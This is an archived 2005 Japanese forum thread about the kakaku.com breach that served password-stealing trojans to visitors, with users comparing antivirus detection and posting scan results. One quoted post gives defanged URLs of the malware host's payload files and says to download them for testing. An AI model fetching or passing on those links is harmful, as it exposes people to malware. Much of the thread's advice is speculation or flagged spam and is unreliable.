5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

価格ドットコムが落ちた件について

1 :1です:2005/05/16(月) 01:05:50
語ってください。
毎日プラズマテレビの価格をチェックしていたのに
一週間ほど閉鎖らしいです、ほんとに腹がたちます。

犯人市ねや!!ゴルァァァ!!

2 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:09:02
どこかのスレにアドレス張ってあったよね。
ウイルス反応が出る価格com内のアドレス。

3 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:09:53
http://www.kakaku.com/

4 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:10:19
topの警告、gifで表示しないとならない位、ヤバい攻撃を喰らってるの?

こんだけ色々、利害とか絡んでるサイト、借りに、日本人が白もしくは攻撃でもしてたら、捕まったら
エラい事になるよね。
どんな攻撃喰らったんだろ…

5 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:12:30
【kakaku.com】カカク・ドット・コム【価格.com】
http://money3.2ch.net/test/read.cgi/shop/1096906296/

価格COM落ちてない?
http://pc8.2ch.net/test/read.cgi/internet/1116099492/

価 格 . c o m 
http://pc8.2ch.net/test/read.cgi/internet/1116066767/

6 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:22:53
なんか疑似体験ソフトとか書いてあるけど、この阿知らせページそのものがハッキングされたものの気がして
クリックできない。

7 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:22:59
さすが、Nod32

8 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:27:46
kakaku.comが不正アクセスで閉鎖 閲覧ユーザーはウイルス感染も
http://news19.2ch.net/test/read.cgi/newsplus/1116172924/

実はハッキングされてたというオチ
http://kakaku.com/

9 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:29:29
セキュリティソフトがウイルスの可能性があるからな。そのためにマイクロソフトのアップデートさえやらないことにしている。

10 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:32:12
だいたいそのアンチウイルスの体験版ってクリックしても重くて反応しないし。
価格のそのお知らせページがなぜか画像になってるし。(これ怪しすぎない?)
このお知らせページ自体犯人が作ったものだったりして

11 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:34:33
そう。画像だった。

12 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:37:45
http://canon-sol.jp/product/nd/trial.html
もつながらなくなった。

巻き沿い食らったな
http://canon-sol.jp/

13 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:43:35
二回ほどクリックしたけど
今トレンドマイクロので調べたらウイルスなかった

14 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:44:51
NOD最強伝説

15 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:45:28
NODかわいいよNOD

16 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:47:02
図らずも各ウイルス対策ソフトの能力が試される のか?

17 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:49:52
>>15
俺と同じ事かくなや

NODかわいいよNOD

18 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:51:24
>>14


19 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:53:00
trojandownloader.small.AAO
PSW.Delf.FZ

20 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:00:49
明日は会社で祭りかなぁ

21 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:13:17
とりあえず
シマンテックとトレンドマイクロは検出するみたいだね。

22 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:14:24
あとはフリー系か。
どうだろ。俺AntiVirなんだけどw。

23 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:16:06
>>21
おいこら、てめ!
その2社言うなら、マカフィーはどうなんだよ
マカフィーは!

24 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:16:17
>>21

ソースは?

25 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:16:44
マカフィーはまあいいとして、あとはフリー系だな

26 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:17:38
>>25
全然良くないだろ。シャアは大きいぞ。大ジョブなの?まじ不安。

27 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:18:08
http://kakaku.com/manual/

28 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:24:06
洩れは高級ソフトAVGのそれもFREEだぞ!
ダイジョーブか?
昨日の朝方なんどもアクセスしたぞ..
今日現在PCは生きてるけど、
エッチな画像とかメール配信しちゃうやつじゃないだろうな..汁

29 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:24:51
>>24
いや、その検出されたウイルス名がシマンテックのサイトにあったから・・・
そんだけ。あと、トレマイの人が検出されたっぽいこと書いてた。そんだけ。
ttp://www.symantec.com/region/jp/avcenter/venc/data/trojan.psw.ajim_bbs.html

30 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:26:08
NOD32最強説

31 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:28:07
>>28
どうも3年前の古いタイプみたいだから、
古いタイプも網羅的にカバーしてる大手は大丈夫っぽい。
最近流行のにフォーカスしてる、AVGとavastはアウトっぽい。

どうも、俺の勝手な所見なだけど、こいつをつっこんだハッカーって、
対策ソフトってフリーのしか入れてないから、
それで検出されないものを選んで仕掛けていったんじゃないかと思う。

ちなみに、機能としては、exeやtxtを開くたびに起動して、
パスワードらしき文字列を探して、送信するタイプみたい。

32 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:28:17
>>29

サンクス。
さきにノートンやバスターで検出できると書けよ価格コム。
情報が錯綜していて、価格コム内部が大混乱なのが想像できる。

33 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:29:09
価格com暴落くるーーーーー
新興市場オワタ

34 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:29:10
カバーしてるのか?

ノートンのウイルス時点で似たようなのはあったがこれはググってもNODのページしか引っかかんなかった

こんなのがあったから貼っておく

899 ■ 番組の途中ですが名無しです ■   sage [2005/05/16(月) 02:13:43 ID:Eud0DmB50]  new

http://money3.2ch.net/test/read.cgi/shop/1096906296/574
を参考にノートンで検索中
たしかにLiveUpdateではダメで(5/11パターンのまま)
IntelligentUpdaterで5/14付のパターンにしてから検索

35 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:32:29
マカフィーはどうなんだマカフィーは

36 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:33:49
>>34
うげ?それじゃ、N+の情報はガセか。
酷いやつが居るもんだよ。

37 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:34:46
ttp://kakaku.com/manual/

ワロチ

38 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:39:42
NODのサイトってウイルス手動削除の方法載ってるページ無いのか?(´・ω・`)
シマソテックやテtrンドマイクロはあるのに

39 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:45:31
あら〜、ほんとだっぺよ。
ノートンの超最新(手動)でないと
検出できないだーよ。

これ、相当悪質なウィルス。

40 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:47:03
ウイルスソフトが無くてもwindowsupdate で最新なら大丈夫だけどな。

41 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:47:22
ウィルス定義ファイルのダウンロード

Intelligent Updater:
ウイルス定義ファイル作成日: May 14
ウイルス定義ファイルリリース日: May 14
Norton AntiVirus Corporate Edition
ウイルス定義ファイルバージョン: 70514f
シーケンス番号: 44396
拡張バージョン番号: 5/14/2005 rev. 6
ウイルス対策済み数: 69540    ←そのわずか16個の中に、kakaku.comに仕掛けられたやつが・・・・(´・ω・`)

LiveUpdate:
ウイルス定義ファイル作成日: May 11
ウイルス定義ファイルリリース日: May 11
Norton AntiVirus Corporate Edition
ウイルス定義ファイルバージョン: 70511f
シーケンス番号: 44314
拡張バージョン番号: 5/11/2005 rev. 6
ウイルス対策済み数: 69524

Norton AntiVirus for Mac
ウイルス定義ファイルリリース日: May 12

42 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:49:28
>>41
すげぇな。
でもなんでLiveupdateのほうがこんなにも遅れるんだ?

43 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:53:23
>>42
liveupdateは確か3日に一度しかやらんとかでしょ?
常に、インテリの方はベーター版って感じじゃないの?
大規模な障害になるまえに、自分で落とすような
マニアな人間を人柱に使うという。

44 :名無しさん@お腹いっぱい。:2005/05/16(月) 02:57:54
参考資料。亜種みたいだから細かいところは違うかも。

Win32.Gema.F (TrojanDownloader.Small)
ttp://www.casupport.jp/virusinfo/2004/win32_gema_f.htm

Trojan.PSW.Ajim_bbs (Trojan.PSW.Delf)
ttp://www.symantec.com/region/jp/avcenter/venc/data/trojan.psw.ajim_bbs.html

45 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:01:06
価格コムウィルス被害者の会結成か!?

46 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:02:11
http://www.google.co.jp/search?num=100&hl=ja&newwindow=1&q=site%3Akakaku.com+&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
ここから宝探してくれ!!

47 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:07:04
>31 え〜AVG使用のビンボ人は泣き寝入りしろって事か?
しょ〜がない金のかからないところで、シマンテックのオンラインスキャン中だが
駄目か?

価格は一ヶ月に一回くらいしかいかないのにトホホ

48 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:15:41
>>47
シマンテックのオンラインスキャンは当てにならないよ。
以前ウイルスに大感染したとき、40個ほどのexeが感染しているといわれて
ノートンをローカルでかけたら5000個のEXEが感染していた

かなり漏れがあるっぽい。

49 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:18:12
>>48
正直そんなにウイルスに感染するあんたの発言も当てにならんな。

50 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:23:50
おっ、YAHOOにNEWS乗ったぞ
それもコピーで
http://dailynews.yahoo.co.jp/fc/domestic/net_crime/?1116180613

51 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:24:10
何回もアクセスしてもダメだったので漏れのPCが
おかしいのかとおもてしまったよ。
購入検討のために今利用したかったのに・・・残念

52 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:32:48
>>50
リンクだけ?豪快だな

53 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:37:03
価格.comを毎日回覧していましたが、何か問題があるのでしょうか?
ちなみにNIS2004は導入済みです。

54 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:50:07
>>52
記事を書く時間すらも惜しんだんだろ。
この姿勢を当事者の価格.comも見習って欲しかった。
3日も放置して被害拡大させまくりやがって、アホか。

55 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:53:56
>>54
今は大丈夫なんだろうけど、価格.comを閲覧しただけで感染と書いてるのに、
リンクだけ張っているのがおかしいんじゃないのか?って事じゃ?

56 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:54:15
不正アクセス発覚から3日間も放置ってことは、
もしやサイバーノーガード戦法?

57 :名無しさん@お腹いっぱい。:2005/05/16(月) 03:55:00
これで感染拡大したら超ウケルのに

58 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:00:43
>>56
矢吹丈きたー!

59 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:01:59
どーなってたら感染してるのかまるで分からんw

60 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:05:05
閲覧で感染するのはIEのみ?
パッチ当ててれば大丈夫?
感染するとどこがどうなるの?
手動で削除できないの?

対応してるのが
NOD32アンチウイルスこの時間でもサーバー激重なのに、ミラーもしてくれないのか…
どうしたら良いのか、情報も少ないし。
明日は祭り決定ですね。

61 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:07:12
NOD32アンチウイルス?ダウンロード標準版
http://www.vector.co.jp/soft/win95/util/se288813.html

62 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:10:46
自分の履歴見たら5/11に価格見に行ってた
ノートンの定義ファイル5/14にUPしてスキャンしたが何も出ず
安心して良いのだろうか

63 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:12:32
>>62
NISなら怪しいoutは検出してくれるから
最後の最後で防げるだろ。

64 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:13:27
今回のウィルス配信元サイトである "www.j4sb.com" を含むページをググってみると...

(((( ;゚Д゚)))ガクガクブルブル

65 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:15:29
>>64
ひっかかるね

66 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:18:57
NISが入ってるんだけど、この体験版を入れても大丈夫なのか?
それとも(ry
どうすればいいのよ┐(´д`)┌

67 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:21:25
今回のウィルス配信元サイトである "www.j4sb.com" を含むページをググってみると...

(((( ;゚Д゚)))ガクガクブルブル

68 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:26:35
>>66
NISに14日付けのIntelligentUpdaterを適用してスキャン
>>34

69 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:31:43
のびすく仙台ワロタ

70 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:36:02
>>56
waros

71 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:41:39
のびすく仙台ってHP開いたら感染したりしないだろうなw

72 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:45:33
>>71
多分する。

73 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:55:39
NOD32アンチウイルス簡単には更新できねーな
なんだこりゃ

74 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:56:11
家電板から来ました。

なんかkakaku.comに登録したメアド宛てにスパムがくるようになったんだけど今回のクラッキングが原因?
12日以降くるようになった。

Nell Sheehan Re [19] 2005/05/14 18:10
Emerson Connolly information 2005/05/14 12:02
Ismael Spangler Re [4]: 2005/05/12 22:44
Douglas Easley re[12] 2005/05/12 21:09
Vanessa J. Smith Popular soft - 75% OFF 2005/05/08 02:09


75 :名無しさん@お腹いっぱい。:2005/05/16(月) 04:59:44
>>74
恐らくそうだろうね。メールアドレス漏れたって自白してるし。

76 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:02:10
こんな未明に糞重い状態じゃ午前中にはどうなるんだろう

77 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:19:14
ニュー速+のスレから転載
> eset (開発元) からNOD32をダウンロードすることは可能である。
http://www.nod32.com/download/trial.htm
> とりあえず心配な方はこちらから。ただし、英語版しかない。

↑の入れたら自動で定義ファイルのアップデートかかるから
あとはNOD32立ち上げてScanning Targetsで
スキャンの必要のないドライブをダブルクリックで対象から外してScan

それにしても、こんな中途半端に情報出したら
利用者は余計に混乱するの価格は分かってないのかね?

78 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:20:07
※緊急※ ウイルスバスターに続いて、NOD32で二度目の大きな不具合発生です。
まだ直っていないので注意。

NOD32をWindows Server 2003で使っているユーザーの方へ。
sp1をあてると通信不能となり、最悪の場合リブートの繰り返しとなります。気をつけて下さい。
開発元が現在対策中です。
ttp://canon-sol.jp/supp/nd/wndt4210.html

※過去(約1年前)の大きな不具合
●NOD32にレジストリを破壊してOS再インストールが必要になる重大バグが発生。
・Windows シャットダウン時にブルースクリーンになる問題
・登録済みのアプリが強制抹消される問題
ttp://canon-sol.jp/product/nd/v20008.html

79 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:21:14
ウィルス対策ソフトNOD32 本スレパート2

●常駐モジュールが少ない→ユーザーレベルでは意味ナシ 削除
●常駐モジュールの使用メモリが少ない→ユーザーレベルでは意味ナシ 削除
●パターンファイルが小さい→ユーザーレベルでは意味ナシ 削除
●パターンファイルの更新頻度が高い→他のソフトと大差なし 削除
●スキャンが速い→環境依存 重いと言う人もいる 削除
●メール保護はメールクライアントの設定変更不要→保留
●設定自由度が高い→保留
●ヒューリスティック手法が優秀→根拠不明 その割に誤検出が多い 削除

∴NOD32問題点改訂版
【良い点】
●メール保護はメールクライアントの設定変更不要
●設定自由度が高い

【悪い点】
●信じがたいことにLZH圧縮ファイルに対応していない
●低機能なAVのわりに価格がノートンやウイルスバスターとほぼ同じ
●PFW機能が無いくせにKerioとの相性が悪い
●インストールボタンを押すといきなり再起動する致命的なトラブル
●とんでもないことにノートンの設定を勝手に変更してしまう
●いくらなんでも誤検出が多すぎる

80 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:21:36
NOD32アンチウィルス Part15
http://pc8.2ch.net/test/read.cgi/sec/1092030727/

問題点
●レジストリを破壊してOS再インストールが必要になる重大バグが発生。

・登録済みのアプリが強制抹消される問題
・Windows シャットダウン時にブルースクリーンになる問題
(公式ホムペのトラブル詳細 http://canon-sol.jp/product/nd/v20008.html

●既知の問題点・バグ等
 ・AMONではUPX圧縮されたウィルス検査がパターンチェックしか機能していない。
 ・UPX Packedされたアプリをスキャンする時重い。(OpenJane(Doe),Proxomitronなど)
  原因
  検査履歴と実ファイルの特徴が異なる為に検査を繰り返す干渉を引き起こす。
 ・Win98(SE含む)でIMON有効、Proxomitron常駐状態で、IEを実行→終了したら
  RPC4RT.DLLのエラーが出るらしい
  同じ条件で“かちゅ〜しゃSkin Manager”を使用→終了でもエラーが出るらしい
 ・lzh圧縮されたファイルをスキャンしたときに、一部エラーを出すファイルがある
  →NODのlzh対応は100%では無いらしいので、たまにチェックできないものが有ります。
・AMONが重い。
・telnetdやcvsで不具合が出る
・AMONの常駐を一旦停止してから再び再開しようとすると、
 「常駐保護をロードできません」と表示され、再開できない。
・FDのスキャンを止められない。
・NOD32アンチウイルスのアンインストール時の問題が発生。

81 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:22:18
●既知の問題点・バグ等の続き
 ・Kerio PFにてルール画面を最初に表示するとき、スクロールでちらつく。(数人)
 ・SygatePFにてルール設定画面が重くなる。
 ・AMON常駐時、動画動画の再生がコマ落ちする。
 ・Cygwin のX Windowが立ち上がらない

82 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:24:04
NOD32アンチウィルス Part15
880 名前:名無しさん@お腹いっぱい。 :2004/12/03 20:17:58
俺プログラマーだけど、NOD32はメールプロキシとしては欠陥があるね。
socketをMSG_PEEKでrecvしても受信先のバッファを削除してしまう。
だからMSG_PEEKを使ったアプリの動作はおかしくなる。

それとIMONの”互換性の設定”というのもよく分からない概念だね。
何に対する”互換性”なのか分からないし、
なぜ互換性を低くしないと、きちんとした検査ができないのかも分からない。
他のアンチウイルスソフトではそんな概念はないしね。
設定変えたら再起動してくださいとか、スマートじゃない部分も多い。
ウイルスの検出能力とかはよく分からないけど、
ソフトウェアの品質とか仕様の面では他より1ランク落ちる感じがするな。

83 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:25:20
うはwwwもう入れちゃったよ。・゚・(ノ∀`)・゚・。

84 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:26:48
なんかドツボにハマッっていくぞ('A`)

85 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:30:50
入れるにも入れた後も苦労する駆除ソフト
これはウイルスもびっくり

86 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:35:53
>61それ有料版じゃねぇ〜か
価格のせいでこんな時間になったよホント
どーしてくれんだ漏れの貴重な時間を〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
漏れの背中が窓なんだが、気がついたら明るいじゃねぇ〜か
電気つけてたんで気が付かなかった.......


87 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:36:10
867: 05/16 03:21 +IW/op5T [sage]
悲しいお知らせ
WinXPsp2 updateはいつもしてる
NIS+NAV環境でしたが
NOD32にて感染確認
sp2もNAVも意味無いですよ

88 :名無しさん@お腹いっぱい。:2005/05/16(月) 05:42:06
http://pc8.2ch.net/test/read.cgi/sec/1108107024/659
>>594
俺も前にNODを使っていたけども色々と使い辛かった。
そのレポートを作った人のように各製品のウイルス検出ソフトの性能を調べるようなマニアでも、
気を付けないとNODの設定をミスってテストしてしまうことになると思う。
互換性という概念なんかも分かり辛い。なぜ互換性を下げないとウイルス検出が十分に出来ないのかしっくりこなかった。
設定を変えたら再起動が必要になるとか、システムの作りが荒削りだと感じた。
ソフトウェアとして品質とか仕様の面では他より落ちる感じがした。やはりまだ新参のベンチャー企業が作った製品だと思った。
スキャンの結果ログもウイルスだけログがなかったから、とても使い辛かった。
検出速度は速かったけども、常駐させるとけっこう重くて動画再生がカクカクになったりした。
相性が悪い製品もけっこうあった。Sygateの画面が重くなって非常に不便だった。
UPX Packedされたアプリも相性がかなり悪くて重くなった。

>>649
俺もアップデートの時にレジストリを破壊されて青画面が出たよ。
NODは色々な面で少なくとも初心者向けの製品ではないよな。。
涼しい顔をして色々なトラブルから復旧できるスキルが必要。
GUIからしてマニアックな雰囲気だしな。
ttp://ratan.dyndns.info/avast4/maca/newnod3207.png

89 :_:2005/05/16(月) 05:56:33
>>87
その書き込みの後に、補足がある。

-----------------------------------------------------------
900 名前:名無しさん@5周年 投稿日:2005/05/16(月) 03:26:14 ID:+IW/op5T
いや、マジですよ

テンポラリーインターネットファイルの中に何たら.cssというのが感染してるとのこと
NAVでも全検索かけてみたが無反応だった=感染しちゃってるんだろうな…
-----------------------------------------------------------
939 名前:名無しさん@5周年 投稿日:2005/05/16(月) 03:31:55 ID:+IW/op5T
>>900
ああ、そうなのか?少し安心
NAVが何も言ってこなかった=ウイルスと気づかずに受け入れちゃった
と思ってたのだが、sp2あたりが止めててくれたのかな?
-----------------------------------------------------------

その書き込み元の人は、キャッシュに残っていただけで感染してない。

90 :名無しさん@お腹いっぱい。:2005/05/16(月) 06:05:13
>>31
>最近流行のにフォーカスしてる、AVGとavastはアウトっぽい。
感覚でテキトーなこというなよ。

ウィルスのパターンデータなんてそんな大きなもんじゃないんだから、
それこそ1980年代のものから全部入ってるっつの。AVGもavast!も。


91 :名無しさん@お腹いっぱい。:2005/05/16(月) 06:18:05
ノートン先生は、最新パターンを手動更新で対応済み。
ttp://www.symantec.com/region/jp/sarcj/download.html
たぶんバスターも本日中には対応するだろう。

92 :名無しさん@お腹いっぱい。:2005/05/16(月) 06:30:21
漏れも祭に巻き込まれたかも・゚・(ノД`)ウワーン

93 :名無しさん@お腹いっぱい。:2005/05/16(月) 06:39:45
バスターはとっくに更新期限切れてちょっと前にアンインスコしてるし
何もウイルスソフトねええ
感染してるかどうかもわからん・・・

94 :名無しさん@お腹いっぱい。:2005/05/16(月) 06:39:48
あそこって、IIS+ASP+SQLServerなんていう組み合わせじゃなかったかな?
ハッキング以前にシステム上のセキュリティ・ホールがあったら。。。。

95 :名無しさん@お腹いっぱい。:2005/05/16(月) 06:46:23
IE以外のブラウザでも感染するのか?

96 :名無しさん@お腹いっぱい。:2005/05/16(月) 06:50:21
>>93
いつ更新するか分からんけどバスターでもノートンでもオンラインスキャン利用しる
今は検出しない('A`)

97 :名無しさん@お腹いっぱい。:2005/05/16(月) 06:52:24
やっぱWindowsサーバはダメだ
またイメージダウンだな、MS

98 :名無しさん@お腹いっぱい。:2005/05/16(月) 06:54:01
>>96
バスターのほうで只今やってたところ・・
あてにならないけどとりあえず終わるまで待つか・・・

99 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:00:44
てかまたチャイナかよ・・・・こいつら逮捕できないの?

100 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:01:27
普段から新種キンタマに備えて常駐プロセスを暗記してる漏れは勝ち組。
怪しいプロセスが動いてれば瞬時に分かる。

101 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:01:57
よくわからんが、プログラムを修正しても攻撃が続いてどうしようもなくなった
とこを見るとOSのセキュリティホールを使った攻撃か。


102 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:08:59
>>100
つ[svchost.exe]

103 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:26:01
>>21
>>32
>>36
>>53
>>62-63
>>66

867: 05/16 03:21 +IW/op5T [sage]
悲しいお知らせ
WinXPsp2 updateはいつもしてる
NIS+NAV環境でしたが
NOD32にて感染確認
sp2もNAVも意味無いですよ


104 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:32:06
>>103はマルチ。
NOD32アンチウィルス Part16
http://pc8.2ch.net/test/read.cgi/sec/1115120495/318
他、多数のスレ。

105 :暫定まとめサイト作成中の人:2005/05/16(月) 07:34:58
■暫定まとめサイト
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm

情報を集めております。
何卒宜しくお願い致します。

106 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:39:10
>>78-83>>88はマルチコピペ荒らし
NOD32アンチウィルス Part16
http://pc8.2ch.net/test/read.cgi/sec/1115120495/318
他、多数のスレ。

107 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:40:17
>>106
×http://pc8.2ch.net/test/read.cgi/sec/1115120495/318
http://pc8.2ch.net/test/read.cgi/sec/1115120495/

108 :暫定まとめサイト作成中の人:2005/05/16(月) 07:43:09
>>107
ありがとう。暫定まとめサイトの
【NOD32不具合(Windows Server 2003ユーザー)】
の項目を削除して訂正します。

109 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:44:11
んで、このウイルスに感染するとどうなるの?

110 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:47:06
kakaku.comが不正アクセスで閉鎖 閲覧ユーザーはウイルス感染も★2
http://news19.2ch.net/test/read.cgi/newsplus/1116182083/


【ハッキング】 価格.comがハッキングで閉鎖、閲覧者
http://news19.2ch.net/test/read.cgi/newsplus/1116194590/

ID:ByPasxUTで検索

111 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:48:58
879 名前: 名無しさん@5周年 [sage] 投稿日: 2005/05/16(月) 06:30:58 ID:8NCW1riY
PSW.Delf.FZの検出能力の確認。
ttp://www.j4sb.com/count/counter.ap?id=a02
ttp://www.j4sb.com/count/data/a02.css
上記URLからa02.cssを保存してこれをスキャン

Norton AntiVirus 11.0.9.16
パターンファイル i32 Intelligent Updaterパッケージ 20050515-008-i32.exe
ttp://definitions.symantec.com/defs/20050515-008-i32.exe
結果、無反応。

NOD32 trial version
ttp://u4.eset.com/eval/win/v2/nentenst.exe
Version: 1.1097(20050515) NT
結果、検出。
C:\(中略)\a02.css - Win32/PSW.Delf.FZ trojan

頼むよ、ノートン先生orz

の方法でオンラインバスターを試しても反応せず



112 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:53:43
なんか混乱しまくってるなぁ
三年前のウィルスってのがちょっと驚いた

大きなサイトだと影響もデカイ、と。
ノートン先生がlive-updateで最新にならないってのも驚きですね
eTrust使ってる俺はどうすりゃいいのさ


113 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:55:03
・FireFox 1.0.3
・WindowsXP Home SP2 あんまりアップデートしてない
・ノートンインターネットセキュリティ2003

NOD32 でチェックしたら無事だった。
FireFox のおかげだと思う
いやー早めにIE捨ててよかった〜


114 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:00:03
>>111
a02.cssはeTrustで検出できなかった
vetてのとInoxxxxITて奴の両方だめぽ


115 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:02:49
AntiVirに期待

116 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:19:32
こういうのって、レジストリのrunの項目見れば感染してるかどうか
分かるんじゃないの?

117 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:29:51
>>111
F-Secureは大丈夫だった

118 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:36:42
>PSW.Delf.FZ

本日午前8時半前:

VirusTotal(http://www.virustotal.com/)での結果

AntiVir6.30.0.1205.13.2005no virus found
AVG71805.13.2005no virus found
Avira6.30.0.1205.13.2005no virus found
BitDefender7.005.16.2005BehavesLike:Win32.AV-Killer
ClamAVdevel-2005050105.15.2005no virus found
DrWeb4.32b05.15.2005no virus found
eTrust-Iris7.1.194.005.15.2005no virus found
eTrust-Vet11.9.1.005.13.2005no virus found
Fortinet2.5105.15.2005no virus found
Ikarus2.3205.15.2005no virus found
Kaspersky4.0.2.2405.16.2005Trojan-PSW.Win32.Delf.fz
McAfee449105.13.2005no virus found
NOD32v21.109705.15.2005Win32/PSW.Delf.FZ
Norman5.70.1005.13.2005no virus found
Panda8.02.0005.15.2005no virus found
Sybari7.5.131405.16.2005Trojan-PSW.Win32.Delf.fz
Symantec8.005.15.2005no virus found
VBA323.10.305.16.2005no virus found

119 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:37:18
Jotti's malware scan(http://virusscan.jotti.org/)での結果

AntiVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found BehavesLike:Win32.AV-Killer (probable variant)
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found Trojan-PSW.Win32.Delf.fz
mks_vir
Found nothing
NOD32
Found Win32/PSW.Delf.FZ
Norman Virus Control
Found nothing
VBA32
Found nothing

120 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:38:35
>>118-119
GJ


121 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:41:21
シナチク発なのか?

122 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:42:03
ノートン先生はまだですか〜?(;´Д`)

123 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:46:15
>>113
釣りか?
FireFox1.0,3には極めて危険なセキュリティホールがあるわけだが…

124 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:46:46
297 名無しさん@5周年 sage 2005/05/16(月) 08:35:59 ID:8yKg3dDH
一応、報告を。

カカクコクは、ほぼ毎日閲覧。
Win 2000 SP4
IE 6.0
毎日、Win、OfficeのUpdateを適用。

マカフィー・ウイルススキャン(常に最新)
Spybot(常に最新)

で、先ほどNOD32アンチウイルス体験版(最新定義ファイル)で
ウイルスチェックをしたが何も検出されず。

125 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:48:07
おまえらここのログを手がかりに価格コムにごねて
もうけようとしてるな。それだけはやめろよ。

